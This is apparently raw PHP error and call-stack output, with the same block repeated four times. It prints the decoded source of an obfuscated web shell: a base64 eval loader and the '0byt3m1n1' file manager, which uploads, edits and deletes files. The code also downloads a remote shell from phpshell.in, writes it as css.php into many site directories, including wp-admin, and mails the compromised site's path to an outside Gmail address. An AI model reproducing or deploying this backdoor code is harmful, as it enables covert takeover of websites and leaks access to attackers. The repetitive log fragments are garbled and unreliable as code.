Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.2968541248fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:168
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 169
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.3030541248fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:169
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 170
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.3060541248fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:170
( ! ) Warning: mail(): Failed to connect to mailserver at "localhost" port 25, verify your "SMTP" and "smtp_port" setting in php.ini or use ini_set() in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 179
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.3116541568mail ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:179
( ! ) Notice: Undefined index: query in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 182
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1